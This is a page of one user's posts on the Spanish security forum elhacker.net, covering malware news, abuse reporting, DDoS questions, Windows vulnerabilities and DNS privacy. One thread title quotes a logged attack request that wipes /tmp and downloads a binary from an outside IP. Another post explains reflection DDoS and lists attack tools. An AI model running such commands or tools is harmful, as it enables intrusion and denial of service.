elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Top 20 herramientas Hacking más populares de 2020


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 [12] 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 ... 486
111  Foros Generales / Foro Libre / Re: Hackean cinturón de castidad con conexión Bluetooth y WiFi al smartphone en: 19 Enero 2021, 23:26 pm
la noticia es cierta, aunque no está muy bien bien explicada en genbeta.

Había un malware (ransomware) ChastityLock de Qiui Cellmate que pedía rescate en bicoins y ahora han publicado el código fuente en vx-underground



el "i have your cock now"  se ha hecho famoso xD

https://github.com/vxunderground/MalwareSourceCode/tree/main/Python

En inglés está bastante mejor explicado:

https://www.vice.com/en/article/m7apnn/your-cock-is-mine-now-hacker-locks-internet-connected-chastity-cage-demands-ransom
https://www.bleepingcomputer.com/news/security/hacker-used-ransomware-to-lock-victims-in-their-iot-chastity-belt/
112  Foros Generales / Foro Libre / Re: Foro especial. en: 19 Enero 2021, 22:56 pm
Tienen visitantes pero seguro que muchos foros son semi-privados xD

https://raidforums.com/
https://hackforums.net/
113  Seguridad Informática / Nivel Web / Re: GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86 en: 17 Enero 2021, 11:17 am
Empiezan los reportes:

https://www.abuseipdb.com/user/52197

De momento intentos SSH fallidos (SSH Brute Force Attacks). Después añadiremos ataques FTP fuerza bruta y reglas mod_security.



Uno de las ip's que le encanta buscar por copias sql es el ASN Russia AS49505 SELECTEL. Bloqueado entero, porque su tráfico no hace otra cosa más que buscar vulnerabilidades

Y uno de los escaners utilizados es (User-Agent)

Código:
Nuclei - Open-source project (github.com/projectdiscovery/nuclei)
114  Seguridad Informática / Hacking Ético / Re: Hacer ataque DDoS a un amigo en: 15 Enero 2021, 20:12 pm
Citar
otro haciendo un montón de pings a nuestras IP públicas, es posible esto?

Por muchos "pings" que hagas no conseguirás absolutamente nada... aunque tengas una conexión a internet mucho más potente.

@r32  comenta un fallo en la pila TCP-IP de Windows 10 bastante reciente, pero ya corregido, pero que sólo funciona con ipv6

No necesitas tener ningún puerto abierto para "tirar" la conexión. Puedes inundar una IP con un DrDDoS apuntando a cualquier puerto aunque esté "cerrado", ya que el tráfico se dirige igualmente a su IP (red) y si son muchos paquetes( pps) se satura. Pero para hacer DrDDoS necesitas una red que permita IP spoofing (para poder amplificar) y usar librería manipulación de paquetes como scapy.

DrDoS (Distributed Reflection/Reflective Denial of Service)
https://blog.elhacker.net/2014/06/udp-flood-inundacion-reflection-attack-ataque.html

Algunas herramientas DDoS muy conocidas son

Citar
hping3
packit
nemesis
r2dr2-udp-drdos-tool
AMP-Research (UDP/TCP amplification vectors, payloads and mitigations)
LOIC (Low orbit Ion Canon)
HOIC (High Orbit Ion Cannon)
HTTP Unbearable Load King (HULK) . Tor's Hammer
Low and Slow Attacks: SLOWLORIS (SlowSloris, SlowPost, nkiller2, recoil)
ApacheKiller, RefRef. Rudy (R-U-Dead-Yet), thc-ssl-dos
http2 (hpack)
115  Sistemas Operativos / Windows / Re: Webcam del Lenovo T590 no funciona en: 15 Enero 2021, 19:45 pm
Son cosas que pasan, no es muy habitual, pero ocurre de vez en cuando.

El último portátil casi nuevo estropeado que he visto ha sido un Acer (no era mío) El servicio técnico también se portó muy bien, pero es un poco engorro.
116  Foros Generales / Noticias / La WikiPedia cumple hoy 20 años en: 15 Enero 2021, 19:36 pm
Hoy Wikipedia celebra su 20 cumpleaños.

Se erige como un brillante ejemplo de #WebWeWant: un espacio abierto y colaborativo que brinda acceso gratuito al conocimiento en todo el mundo.

Wikipedia, que fue abierta por primera vez hace 20 años el 15 de enero del años 2001.



 El 15 de enero de 2001 el empresario Jimmy Wales y el filósofo Larry Sanger, ambos estadounidenses, crearon Wikipedia, una enciclopedia libre, escrita y editada por voluntarios y publicada en internet, que nació para sumar conocimiento y con la convicción de que este es propiedad de todas las personas del mundo.

https://wikimediafoundation.org/es/wikipedia20/
117  Foros Generales / Foro Libre / Re: Nieve plástica caída en Madrid es resistente al fuego... en: 14 Enero 2021, 20:31 pm
"Negacionistas" de la nieve jajaja

 Para empezar, hay que tener en cuenta el tipo de nieve que vamos a quemar, que está apelmazada; y, para continuar, los mecheros suelen ser de butano o gasolina, que contiene una gran cantidad de impurezas que, al quemarse, forman hollín.

El biólogo y divulgador asegura que esta reacción es ‘normal’, y los restos negros en la nieve son precisamente ese hollín, que termina depositándose en la superficie. Es más, el combustible del mechero también sería responsable del olor, ya que procede de esas mismas impurezas.

Fuente:
https://twitter.com/VaryIngweion/status/1347986137470693376?s=

Lo peor son los de la conspiración del 5G que compran una caja para "protegerse" y luego se quejan que la señal del Wifi se reduce.....  :xD










118  Foros Generales / Noticias / Re: Microsoft corrige un error de Secure Boot que permite la instalación de rootkit de Windows en: 14 Enero 2021, 19:27 pm
Increíble, vaya temporada que llevamos.

RCE en Windows Defender  (CVE-2021-1647) y RCE en Microsoft Office 365 (CVE-2020-16875)

Making Clouds Rain
https://srcincite.io/blog/2021/01/12/making-clouds-rain-rce-in-office-365.html

Y el "feature" del error atributo $i30 en NTFS que corrompe el disco duro es genial.......
https://blog.elhacker.net/2021/01/error-en-windows-10-corrompe-su-disco-NTFS-i30-bitmap-icon-archivo-comando.html
119  Foros Generales / Dudas Generales / Re: pregunta tonta sobre conexión entre redes Whatsapp y Facebook en: 14 Enero 2021, 19:17 pm
La imagen la ví en Twitter.

Bueno, tienes razón que la copia de seguridad de WhatsApp se guarda automáticamente en Google Drive.... así que ya tienen correo (Cuenta Gmail) Y como para tener Android tienes que tener una cuenta de Google (Gmail) obligatoriamente nos obligan a pasar todos por el aro....

Y salir del ecosistema de Google, ya es realmente bastante más complicado:

Cutting Google out of your life
https://gitlab.com/SheepKid12/degoogle
120  Seguridad Informática / Seguridad / Re: ¿Web dropbox me deja descargar con VPN pero no sin VPN? Misterio... en: 14 Enero 2021, 19:13 pm
Citar
¿cómo cambio los DNS?

Cómo cambiar las DNS de nuestra conexión a internet

Ya sea un ordenador de sobremesa, un portátil, una tablet o una consola si tiene conexión a internet utiliza servidores DNS para conectarse a internet. Otra opción es cambiar directamente las DNS del router.

    Windows 10: Debemos acceder a la configuración del sistema, a la sección Redes e Internet, la sección Estado y la opción Cambiar opciones del adaptador. Una vez en la ventana que se nos abrirá, veremos las conexiones de red disponibles y tendremos que hacer clic derecho sobre la activa y seleccionar Propiedades. En la nueva ventana deberemos modificar el elemento Protocolo de Internet versión 4 (TCP/IPv4) seleccionándolo y pulsando sobre el botón Propiedades. En esta otra ventana indicaremos que queremos usar unas direcciones de servidos DNS particulares, introduciendo 1.1.1.1 y 1.0.0.1 en los campos para servidor DNS preferido y alternativos.

También deberías cambiar las DNS del router Wifi, ya que así los clientes que se conecten usarán las DNS que tu los digas.

Fuente:
https://blog.elhacker.net/2018/04/dns-publicos-de-cloudflare-1.1.1.1-y-1.0.0.1.html

Y el segundo paso para proteger la privacidad: sería activar DoH y DoT en tu navegador y sistema operativo:

https://blog.elhacker.net/2020/11/activar-medidas-privacidad-navegador-firefox-chrome-windows10-android-linux-esni-tls-dns-over-tls.html

En un período corto de tiempo lo implementará en todos los navegadores por defecto, pero mientras...
Páginas: 1 2 3 4 5 6 7 8 9 10 11 [12] 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 ... 486
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines